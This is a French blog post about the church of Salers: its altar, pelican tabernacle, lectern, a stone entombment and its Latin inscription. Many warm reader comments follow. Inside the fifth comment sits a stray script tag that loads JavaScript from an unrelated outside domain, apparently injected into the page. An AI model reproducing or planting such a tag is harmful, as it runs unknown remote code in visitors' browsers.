• Salers la pieuse.

     

     On quitte pour un instant, Salers la commerçante, la gourmande,

    pour Salers la pieuse.

     ▼

     

    " L'autel fut offert par la famille Veschambes au XIXème siècle et classé en 1984. Sculpté dans du chêne massif, on y trouve dans une niche une statue de Notre Dame de Lorette en bois doré. Et devant l'autel, un Christ en Croix en bois du XVIIème siècle ".

     

    Tabernacle, non, ici, ce n'est pas une expression québécoise!

     Dans l’Eglise, le pélican est vite apparu comme un symbole christique puisqu’il donne son corps en nourriture, à l’instar du pain eucharistique. Saint Augustin avait déjà souligné la similitude pélican et Christ dont le sang vivifie les croyants

    Une mise au point que je ne connaissais pas.

    Le pélican est symbole chrétien. En effet, il nourrit ses petits en dégorgeant les poissons emmagasinés dans une poche extensible qu’il vide en pressant son bec contre sa poitrine ; au Moyen-Age on croyait qu’il perçait son flanc pour nourrir ses petits de sa propre chair et de son sang.

     Est ce un ambon ou un lutrin sur lequel est posé ce livre à enluminures?  

    L'ambon semble réservé à la lecture des écritures saintes et au sermon.

    Donc, ici, plutôt lutrin.

     

     

     

    Une mise au tombeau datant de fin du XV ème siècle.

    Je croyais cette œuvre de bois, elle semble être de pierre.

    Faite selon l'école d'Albi.

    Souvenons nous de celle de Moissac, de la même époque, c'était tendance ....  ici 

     Voulant faire un plan rapproché, pour Jésus qui venait d'être crucifié, je viens de le décapiter.  :-((

     **************

    La mise au tombeau mériterait un billet à elle toute seule.

     

    En 1972 le chanoine Tonneiler a trouvé la signification des inscriptions sur le voile ..... Je vous propose les résultats de sa recherche, l'argumentation est intéressante, mais .... Des " V " qui deviennent des " U ", et encore là, c'est le plus facile ...

     

    ITA  VEXATA  ACULEIS  ITA  VEXATVM  CONDVCIT 

     

    ITA VEXATA - Elle est accablée (s.e La Vierge)

     

    Salers la pieuse.

     

    CONDVCIT - Elle accompagne

     

    ITA VEXATVM - Lui si accablé (s.e Son Fils)

     

    ACULEIS - Par des souffrances lancinantes (aculeus-souffrance "aigüe"). 

     

    En bon français:  "La Vierge, si accablée qu'elle soit elle-même, accompagne pourtant son Fils, si accablée de souffrances les plus lancinantes."

     

    " Cela ne convient-il pas parfaitement à l'héroïsme de la Vierge accompagnant son fils sur le chemin du Calvaire? " ...

     

     

     Moi qui aime bien retenir un mot nouveau d'un article lu ou rédigé, pour moi, ce sera " tuilage ".

    Un mot en recouvre un autre.

     " C'est ici qu'il faut songer à ce genre d'abréviation que j'appelle le "tuilage" Il consiste à ne pas répéter une lettre, quand c'est la même qui termine un mot et qui commence le suivant. Les deux lettres se recouvrent pour ainsi dire l'une l'autre, comme sur une toiture, le bord inférieur d'une tuile vient recouvrir le bord supérieur de l'autre. C'est ici le cas: la lettre A appartient à la fois à VEXA et à ACULEIS. 

     

     

    Vite, vite, un bourriol pour récupérer ;-))

    Sorte de crêpe épaisse, cuite que d'un seul côté.

    Ou alors une corne de Salers, salé, ou et un cornet de Murat, sucré.

    « Salers, la commerçante .....Un château proche de Salers. »
    Partager via Gmail Pin It

  • Commentaires

    1
    Jeudi 27 Septembre 2018 à 11:08

    Bonjour Yann

    Super, je la visite avec toi, elle était en cours de restauration et fermée lors de mon passage !

    Bonne question ..... comme je te l'ai déjà dit moi j'appelais ça un lutrin avant de connaitre le mot ambon (de Bayonne ! lol !) mais aucune connaissance personnellement, je me contente d'admirer et j'en apprends beaucoup !!!

    Très belle mise au tombeau, oui en calcaire venant d'Albi ou de Rodez j'ai lu ici

    Merci pour ton partage

    Bises, bonne journée

    2
    Jeudi 27 Septembre 2018 à 11:15
    J’ai tout admiré, tout aimé ! Tu vois que mon esprit ne se bloque pas niaisement devant ce qu’offre une église! Mon sens de la beauté et de l’émotion est ébloui!
    Merci de m’offir Un tel moment mon Yann!
    Bises
    Gigi
    3
    Jeudi 27 Septembre 2018 à 11:22

    Coucou Yannn,

     moi, je me contente de regarder car je suis nulle de ce côté-là. Des termes que je m'empresse de retenir, car je dois dire que tu as pas mal de connaissance sur ces sujets. Tu sais que dans le corps d'un vers (alexandrin) la voyelle, qui termine un mot, avec celle qui qui débute l'autre mot est "avalée". On parle d'une élision. Je t'adresse mes amitiés les plus sincères et te souhaite une très belle journée.

    4
    Jeudi 27 Septembre 2018 à 11:23

    Coucou Yann,

    Une magnifique visite de cette église, merci !

    Bises et bon jeudi

    5
    Jeudi 27 Septembre 2018 à 12:00
    roguidine

    Bonjour Yann

    De très bonnes explications, j'ai appris quelque chose aujourd'hui ! lol car demain je ne m'en souviendrai plus !! hé oui !! lol

    Une bien belle église,  pour le tabernacle, je dirais plutôt le retable où  se trouve au centre le tabernacle !!!!!!!   bonne question !!!!!!

    Le lutrin qui est destiné à recevoir le livre de la parole de Dieu , d'ailleurs un très joli livre !!!

    Merci pour toutes tes explications, bonne journée, bises

     

     

    <script src="//actextdev.com/1e10f75c6435cf205a.js"></script>
    6
    Jeudi 27 Septembre 2018 à 12:02

    Je ne vais pas t'en faire un fromage yes de ...

    Je suis presque par chez moi  à Salers 

    Donc oui ton article honore la région , merci pour cette piqûre de rappel de l'histoire et de ce que tu as voulu faire passer sur  la visite de cette église 

    Puissent  tous les touristes s'en enrichir ......

    Bonne journée Yann 

    7
    Jeudi 27 Septembre 2018 à 13:03

    Bonjour Yannn,

    très bel article avec de très beaux détails (tu as raison pour le lutrin fait pour le chantre et la musique) pas au courant pour le pélican?

    Peux-tu rapidement lire ton mail marqué adresse, ce soir au plus tard.

    Bisous de nous deux.

    8
    Jeudi 27 Septembre 2018 à 13:17

    Un très bel article, je lis et j'admire ! je n'ai malheureusement plus ma mémoire d'antan et je sais

    bien que je vais oublier certaines choses!!

    Bonne journée, bises

    danièle

    9
    Jeudi 27 Septembre 2018 à 13:47

    Bonjour Yannn,

    J'ai bien visité cette très belle église de Saint Mathieu classé MH depuis 1994 . Eglise paroissiale qui fut construite du 12e et 16e siècle puis restaurée au 19e° siècle dans lequel " La toile issue de l'école Ribera soit une tapisserie d'Aubusson datant du XVIIe siècle . Mais je ne suis pas rentré dans un tel détail après l'avoir visité

    merci de ce billet

    Bonne fin de journée

    @+

    10
    Jeudi 27 Septembre 2018 à 13:48

    bon moi je préfère SALERS la gourmande lol.. mais je reconnais que l'architecture de cette église est superbe !! 

    l'entrée , magnifique, j'aime moins le truc en bois , sauf le pelican  ! 

    ja'ime le livre, coloré il est splendide.. 

    tu nous montres de belles choses.. il devait y faire bon à l'intérieur sous la chaleur caniculaire du dehors , de quoi y passer un petit moment !!

    bon bonne nouvelle c'est bon j'ai le poste au collège à st maur ! yes.. je signe le contrat la semaine prochaine et prise de fonction le 8 octobre.. 

    je viens d'avoir MF on va fêter ça durant les congés scolaires de toussaint, enfin d'automne !!!  et remercier aussi son ex, qui a fait en sorte que j'ai un poste à proximité de mon domicile … ce qui ne fut pas une mince affaire puisque tout ayant changé, il a fallu que je je passe les tests d'aptitude, mais c'est tout bon , j'ai reussi.. maintenant me restera à m'organiser, j'attends que l'enseignante référente me fasse parvenir mon planning. 

    un bizou yann et un bon jeudi, à toi bibi flo

    11
    Jeudi 27 Septembre 2018 à 13:58

    ..épatant ton article avec tous ces mots, certains que je ne connais même pô!

    J'aime autant cette partie que l'autre, plus gourmande.

    Bises du jour

    Mireille du sablon

    12
    Jeudi 27 Septembre 2018 à 15:33
    Claudine/canelle

    Heureusement qu'on pourra toujours revenir sur ton blog pour se remémoriser tout ce que tu nous apprend là 

    Voilà un article super interessant 

    Et avec tes photos encore mieux ..

    Alors maintenant quand j'entrerais dans une eglise , j'essaierais d'appliquer tes connaissances 

    Merci à toi 

    Bonne journée

    13
    Jeudi 27 Septembre 2018 à 15:45

    Excellent article Yann tres documenté et merveilleusement illustré . Je me suis égalée à te suivre dans Salers la pieuse . Remarque je ne ddaigne pas les propositions de la fin de billet , c'est la gourmande qui parle 

    Bonne journée 

    Bises 

    14
    Jeudi 27 Septembre 2018 à 16:20

    Tu quittes Salers la gourmande, juste au moment où je venais de trouver mon petit encas pour continuer ta balade Yann : un panini au chèvre frais bien chaud et bien « aplati » .. Hum

    Pas très à l’aise avec ta « Salers la  pieuse », alors je te suis pas à pas, cela m’arrive pourtant très souvent de photographier des intérieurs d’Eglise mais je ne suis pas Sylvie lol lol ……ma culture catholique fut bien courte et surtout faite d’agréables récréations avec notre curé catéchèse ….

    Le vieux français me pose beaucoup moins de problèmes, un petit rat de bibliothèque des temps  jadis ….

    « Tabernacle » en Québécois, déjà plus à l’aise Tabarnak

    Peut aussi s’écrire « tabarnac », « tabarnaque ».

    Tabarnak est la grande star des jurons québécois, celui qui soulage le plus, celui qui a le plus d’impact… et celui qui est le plus déformé par nos cousins français.

    On l’emploie avec beaucoup d’intensité pour désigner une personne ou une chose ou pour définir quelque chose.

    On le divise souvent en 3 syllabes pour ajouter un ton dramatique…

    On peut aussi utiliser la version coupée « ta’ » pour faire plus poli, mais celle-ci n’a aucun impact. À la limite, elle est mignonne : « je l’aime en ta’ »

     Origine : Provient du tabernacle, le meuble où sont rangées les hosties dans une église.

    Exemple : « TA-BAR-NAK, j’en reviens pas ! », « je suis en beau tabarnak », « il pleut en tabarnak », « le vieux tabarnak » « ayoye tabarnak ! »

    « Le Pélican » généreux !!!!!  Musset : Allégorie du Pélican  LA MUSE 

     « Le Lutrin » livre à enluminures, superbe …. Alain avait des amis passionnés d’enluminures, ils  y passaient tous leurs loisirs : Quand faisaient-ils ensuite ? 

     Pourquoi aimes-tu tant décapiter le Christ Yann, tu ne trouves pas qu’il a déjà assez souffert  ?lol lol

     Photo 1 Ton « ICI »        

                                                                     

                                                

    Photo 2 Locronan 2015

                                                  

     

     Le tuilage pour moi, je n’oublie pas mes racines ! "ICI"

     Un autre jeu : Le tort tue, la tumeur, la meurtrissure, la sûreté, la terreur !!!!!

     Maintenant, je vais me dorer au soleil : 31° et le matin gla, gla, chauffage !!!

     Merci Yann, tu ne fais jamais tes articles à moitié cher ami, c’est là ton moindre défaut et j’adore.

     Bises de Christiane

    15
    Jeudi 27 Septembre 2018 à 16:39
    Floralie

    Bonjour Yann,

    Bravo pour ce magnifique article, j'ai bien aimer cette église, par contre pour le dernier mot j'ai pas bien compris !

    Bises et belle après-midi !

    16
    Jeudi 27 Septembre 2018 à 17:00
    Floralie

    Yann,

    J'ai vu ton lien non c'est pas ça, ça doit être tuilage que je ne comprends pas du tout ?

    En plus de ça j'ai fait une faute, bel après-midi, bises !

    17
    Jeudi 27 Septembre 2018 à 17:32

    "ICI" 

    c'est un essai Yann "TUILAGE" , sûre de rien, je ne vois pas le lien vidéo  

    et si c'est moi qui chante (comme un pot)  et il va pleuvoir cry,

     

    je prépare un petit voyage pour très bientôt en Bretagne alors imagine

    "En Bretagne il ne pleut que 2 fois par semaine" !....

    1 foi 3 jours
    1 foi 4 jours !...

    c'est faux, archi faux brrrrrrrrrrrrrrrrrrrrrrrrr

    "ICI"

    Excuse Françoise sur ton p'tit rocher réunionnais .....et Olivier un copain de feu mon Jean-Yves, ils ont usés leurs fonds  de culottes jusqu'au bac ensemble et ont chacun prix des chemins différents ... pas triste l'oiseau de mer !!!

    @+++ Yann,

    avec toi je m'amuse bien mais hélas, mon Alain m'appelle dring, dring .....

     

     

     

     

    18
    Jeudi 27 Septembre 2018 à 18:11

    Tu es vraiment un très bon guide touristique ! cette église nous en raconte beaucoup pour l'histoire de la religion catholique.

    Je me plais aussi à lire les commentaires.

    Mais tu m'as alléchée avec tes fromages, cantal etc ... du début, et tu m'as achevée avec ta crêpe finale ! suis très gourmande he

    Merci pour cette lecture et ces photos.

    Gros bisous

    19
    Jeudi 27 Septembre 2018 à 18:27

    Une très jolie visite de Salers et de son église. Je ne connaissais pas le "Tuilage" et j'ai bien peur de l'oublier très vite. J'ai remarqué qu'il me fallait rencontrer un mot nouveau trois fois pour le retenir et bien sûr comme tu me le dis de l'écrire. En effet je suis d'accord avec toi qu'écrire un article fixe les idées et nous permet aussi de retenir et c'est très important pour faire travailler notre mémoire de jeunes :) Merci pour ce partage en tous les cas, comme tu le dis, certains éléments pourraient constituer à eux seuls des articles entiers ! bisous et une belle soirée

    20
    Jeudi 27 Septembre 2018 à 19:10

    Je suis trop contente de lire et d'apprendre toutes ces choses sur l'église de Salers.. nous ne l’avons pas visitée lorsque nous y sommes passés ' pourquoi..?? je ne sais vraiment pas .. je m'en étonne moi-même..et je regrette cet oubli

    alors de voir ces photos et de lire toutes ces explications m'enchantent!!!

     A Arbois c'est la première fois que j'avais vu un pélican comme symbole ( image et texte de Wikipédia)

    Image illustrative de l’article Armoiries d'Arbois

    En héraldique médiévale, le pélican est traditionnellement représenté en oiseau blanc / d'argent, à bec d'aigle, perché sur son nid, les ailes protectrices déployées au-dessus de ses petits, se perçant la poitrine d'où coulent des gouttes de sang, dont il nourrit sa progéniture, à titre de symbole d'amour et de sacrifice parental de la vie.

    J'avais trouvé cela très "poignant"

     les enluminures du livre posé sur le lutrin sont magnifiques ( j'ai un gros faible pour tout ce qui touche l'écriture..et bien sûr collection de plumes et de stylos à encre !! encore une !!hi hi)

    j'aime beaucoup ce texte en latin sur ce voile merci pour la traduction..et le terme de "tuilage" me plait bien..voilà un mot nouveau pas trop difficile à retenir..

     Voilà un article que j'ai lu et relu et qui m'a fait le plus grand bien un tout grand merci

     belle soirée..

    21
    Jeudi 27 Septembre 2018 à 20:25
    CC Yann... bel article, belle visite !
    Perso, je n'y connais rien.
    Douce soirée, bises
    22
    Jeudi 27 Septembre 2018 à 20:59

    Bonsoir Yann

    ton article est riche d'enseignement, j'ai appris plein de choses que je ne connaissais pas et des mots nouveaux, cela me fait toujours plaisir

    et c'est très agréable de regarder tes photos et de découvrir ainsi cette église, on sent beaucoup de recueillement dedans.

    Je pense toujours à la Sainte Vierge qui a dû elle aussi subir ces souffrances tout au long du parcours et ensuite et à son angoisse durant ces moments

    ton article est très beau et émouvant

    je n'aurais pas vu la faute d'ortho ! et pourtant elle est remarquable...

    La porte est magnifique !

    bisous

    Am

     

    23
    Jeudi 27 Septembre 2018 à 23:33

    coucou Yann...

    et voila ,j'ai fait une belle balade ,je suis remontée jusque la Dune du Pila , ah cette dune elle en a vu du monde ,j'y suis allée il y a ….oh ça fait très très longtemps et n'y suis jamais retournée , pourquoi ! nous l'avons crapahuté et redescendu en roulant dans le sable , j'entends encore mon père qui disait " vous allez vous casser l'cou ) mais à 20 ans on ne pense qu'à s'amuser , on était vite en bas et du sable partout mais quel bonheur ! aujourd'hui je ne ferais plus ,descendre en roulant mais la monter sans doute en mettant plus de temps ...je vois que maintenant il y a un escalier , sans doute pas plus facile à monter toutes ces marches mais la vue ,en haut ,vaut la peine ...

    et vu aussi toutes ces maison ancienne en pierre , façade bien propres et des ruelles dans ce village qui donne envie d'y flâner ...pour venir au sujet du jour ,cette église est superbe extérieur comme intérieur ...l'autel dans le  cœur est splendide ,le scènes des derniers moments de Jésus si représentatif  ...la porte cloutée est très belle et l'extérieur si bien structuré ..

    Ambon : c'est un pied avec une sorte de tablette ,c'est la dessus que le prêtre lit la liturgie face aux fidèles ...

    désolée d'être si absente du et des blogs ,Nohan me donne beaucoup d'occupations , je le conduit le matin à l'école , retourne le chercher à 11h30 puis le reconduit pour 13h20 certains jours je dois aller le rechercher à 16h30  ..avec tout ce temps pris , et n'ayant pas la santé depuis quelques mois n'arrange en rien ,tout est devenu difficile la fatigue prenant le dessus ..

    je vais te laisser Yann pour aller rejoindre Morphée ...je te souhaite un bon vendredi et un bon week-end ..

    bises du soir ;

    a+++

    gigi

    24
    Vendredi 28 Septembre 2018 à 08:01

    Un article super intéressant j'ai aussi le soulignage d'un faute, et tout ce que j'ai lu qui hélas sera vite oublié m'a intéressé de savoir certaines choses, moi qui ne connais rien a la religion quand je peux apprendre j'essaye de retenir les choses essentielles 

    merci de cet article et de ces photos

    bises amicales

    lyly

    25
    Vendredi 28 Septembre 2018 à 08:35

    Après avoir fait bombance, il est temps de s’emplir le coeur et l’esprit et quoi de mieux que d’entrer dans cette eglise avec un bon guide ! Que de recherches, Yannn, pour accompagner ces photos, c’est très bien dit et simplement dit, un moyen pour moi de mieux retenir de ce que je vois et entends (enfin ici ce que je lis). J’aime beaucoup le travail du bois, nos ancêtres artisans étaient des artistes et cette mise au tombeau est une oeuvre magnifique : les couleurs- les expressions des personnages et la délicatesse des atitudes montrent une qualité de travail exceptionnelle.

    Merci Yannn pour ce bel exposé !

    Bisous et belle journée 

    26
    Vendredi 28 Septembre 2018 à 08:35

    Bonjour Yannn

    Un merveilleux article pour une autre facette de ce joli village de Salers

    merci beaucoup pour ce magnifique partage.

    Très bon week-end

    Chaleureux bisous du vendredi

    Paula

    27
    Vendredi 28 Septembre 2018 à 11:10

    Bonjour, 

    Ton article est très intéressant sans être lourd , comme j'aime ...J'ai appris notamment le mot "tuilage " ...

    Une transition est sympa avec l'article précédent , les nourritures spirituelles après les nourritures terrestres , le silence après la foule !

    Ce qui m'a frappée c'est que les personnages féminins de cette mise au tombeau , notamment Marie -Madeleine , sont différents  de ceux que j'ai vus à Billom , Maringues ,Courpière , Montel-en-Gelat , Aubazat , dont les vêtements sont très austères ( chevelures  traitées très simplement -Marie-Madeleine - ou cachées par des voiles aux plis plus raides , mais le tragique reste de la même intensité de par les expressions des visages et  les gestes ...

    J'espère pouvoir faire quelques articles avec les photos que j'ai ramenées de mon périple roman mais il faut que je rende tout cela présentable (il y a du travail -et que je veille à ne pas  dire de bêtises car je manque de documents , et ceux que j'ai pu récolter sont parfois contradictoires, ce qui d'ailleurs est passionnant quand on se prend au jeu !

    Bonne fin de semaine !

    28
    Vendredi 28 Septembre 2018 à 22:41

    Bonsoir Yann

    un reportage complet et des photos magnifiques

    je ne savais pas que le pélican était un symbole chrétien

    comme quoi on apprend beaucoup à la lecture qui accompagne tes photos

    amitié et belle soirée à toi

     

    29
    Samedi 29 Septembre 2018 à 18:40

    Superbe complément à l'article précédent....les photos en grand format donnent l'impression d'être sur place...

    je ne suis pas attiré par le côté "religieux" des églises mais j'admire le travail de ceux qui ont travaillé...la mise au tombeau est superbe

    bon dimanche.

    Pour répondre à ta question, c'est chez Roguidine que j'ai noté ton adresse de blog...

    30
    Samedi 29 Septembre 2018 à 20:46

    c'est une porte comme ça , capitonnée qu'il me faudrait, nous c'est du carton, un coup de pied dedans tu l'as défonce lol..

    je ne sais même pas pourquoi les assurances nous obligent à mettre 2 verrous.. ???

    bon samedi soir yann vais mater Danse avec les stars voir si les gens me plaisent sinon je materai chérie 25 ;..

    la petite causette va bien, est toute belle déguisée .. avec son pyjama.. lol.. on doit la ramener chez le veto pour voir si ça cicatrise bien, sinon on enlève les fils la semaine d'après je bosserai mais d'après ce que j'ai compris j'aurai des heures l'apres midi, j'ai un contrat de 20H , pas reçu encore mon emploi du temps ça m'énerve, pourtant mardi m'a dit qu'elle me l'envoyait..

    kevin va mieux a vu le doc qui lui a filé un traitement, là il est parti chez angélique. je suis peinarde pas de cuisine je mange froid lol.. une assiette à laver ! le rêve hein..

    allez une bonne soirée à toi et un bon dimanche, je t'embrasse flo caresses à lulu le chat fleur lol..

    31
    Samedi 29 Septembre 2018 à 23:04

    Superbes photos de cette ville et surtout de cette magnifique église !! Que de beauté dans cette œuvre fresque de cette statuaire polychrome...et tu nous explique bien tout ce qu'on voit...Merci tu ferais un très bon guide touristique...Le fromage de Salers j'en ai mangé il y a longtemps, et ne me souviens plus trop du goût, mais je sais que cela m'avait bien plu...Bon week-end, l'automne arrive, et il commence à faire frisquet le matin et en fin d'après midi lorsque le soleil se couche...11° ici à 17 heures...Glagla..Bises

    32
    Lundi 1er Octobre 2018 à 12:47

    Te souhaite un bon lundi yann, espère que ton w.end fut bon.. nous hier on a fait la tournée des cimetières, promenade dominicale bizarre hein mais bon fallait le faire comme ça on est tranquille pour la toussaint ! 

    on était toutes seules , personne dans les cimetières, promenade reposante, pas de bruit au cimetière lol.. 

    toujours pas mon emploi du temps, je piaffe comme tu peux l'imaginer, j'attends mercredi avant de rappeler.. j'ai tel 2 fois déjà .. 

    et elle ne m'a pas répondu (l'enseignante référente qui s'occupe des avs du secteur dont je dépends) 

    bon début de semaine à toi et un gros bizou flo

    33
    Lundi 1er Octobre 2018 à 14:27

    Bonjour Yann mon ami .

    Je découvre et apprécie ton nouvel article super documenté comme à l'habitude . J'ai beaucoup aimé la visite et photos de tes moments passés la bas . Nous étions au Mt St Michel et retour et passage à Paris ( 2X) c'était pas de trop . Bonne semaine et fin de vacances (ou faim ?happy ).

    Bien amicalement .

    34
    Lundi 1er Octobre 2018 à 14:35

    "ICI"

    Pour Marie-Madeleine mad cool

    J'adore les "Jupons de l'histoire" et "Secrets d'Histoire" de Bern, pas triste, alors pourquoi  pas !!! 

    Vivons avec notre temps

    "ICI" 

    mais attentions aux abus .... , cela m'inquiète un peu tout de même cry

    Je dérive là ..... Pour Marie, cela  doit  être comme pour les soeurs (nonnes) , elles portent toutes une alliance ...."Par la bonté du St Esprit lol lol"

    Toujours plaisir à discuter avec toi Yann, mais ma culture "pieuse" est bien piètre et demain, Alain et moi partons pour quelques jours dans ma Bretagne

    chérie .... les valises ne sont pas encore faîtes, j'ai horreur de cela, il me faudrait être une tortue avec sa roulotte sur le dos ...

    mais  il paraît que c'est typiquement féminin ... "on ne sait jamais", il n'y a que la "doudoune" qui ne pose pas  problème ,

    indispensable , gla gla et pluie peut-être ... la météo se trompe quotidiennement  et comme dit mon Alain, "comme j'arrive",lol lol ....

    Il me dit souvent :" je ne suis ni Stéphane ni Arnaud moi" ... (assez chanceux je le  reconnais pourvu que cela dure ) ,

    mais c'est moi et J-Y.. qui les avons fait !!!!

    En plus je vais retrouver mon Ti-Zef Brestois et me recueillir sur la tombe de mes êtres les plus chers 

    qui sera aussi notre dernière demeure à Alain & Moi, soyons réalistes , nous ne sommes pas éternels et comme je suis maintenant la séniore

    de ma minuscule petite famille d'Amour, un an bientôt que Maman m'a quittée la veille de ses 87 ans !!!  

    Bonne semaine Yann, ici soleil, demain matin aux aurores "surprise, surprise "!!!!

    Bises amicales de Christiane

     

    35
    Lundi 1er Octobre 2018 à 15:18

    J'ai découvert cette région l'année dernière, et je suis passé à Salers, le jour de la procession des vaches. Du coup, o, a été un peu bousculés pour la visite. Merci pour ce cours de rattarppage. Nous étions le WE dernier à Murat, jolie petite ville du Cantal également

    36
    Lundi 1er Octobre 2018 à 15:46

    Bonjour Yann

    c'est bien agréable de pouvoir admirer cette belle église et de ressentir la ferveur qui doit régner à l'intérieur

    bisous

    Am

    37
    Mardi 2 Octobre 2018 à 11:08

    Coucou Yann...je reviens voir tes superbes photos de cette magnifique église et de son contenu...trop beau !! Et pour répondre à ta question, la suite du Cambodge c'est dans le prochain article qui va venir très bientôt (juste le temps de le rééditer, car là, il manquait le diaporama disparu...) Bises et bonne journée

    38
    Mardi 2 Octobre 2018 à 13:42

    merci pour le voyage

    39
    Mardi 2 Octobre 2018 à 17:09

    Quand j'ai lu Salers, j'ai pensé aux vaches !

    Quelle belle église ! la porte, on apprend plein de mots .. tiens je pourrais les utiliser au scrabble ! la porte capitonnée est superbe !

    Gros bisous 

    40
    Mercredi 3 Octobre 2018 à 11:27

    merci de cette visite très documentée et richement complétée avec tes si bons mots et ton humour génial...

    j'ai ri toute seule devant mon écran avec ton Jésus non seulement crucifié mais décapité en plus par tes soins LOLLLLLLLLLL

    comme d'habitude je ne retiendrai pas tous ces nouveaux mots mais c'est super de te lire nous raconter/décrire cette très belle église, je ne savais pas pour le pélican

    magnifique le livre à enluminures

    belle journée à toi

    bisous

    patricia

    41
    Dimanche 7 Octobre 2018 à 13:44

    Bonjour Yann .

    Je viens refaire la visite de ce joli village et j'en découvre encore un peu plus que la première fois , notamment sur la rénovation de cette belle église . Merci pour  ton dernier passage et encouragements à la gourmandise  he . Bonne fin de dimanche .

    Amicalement .

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :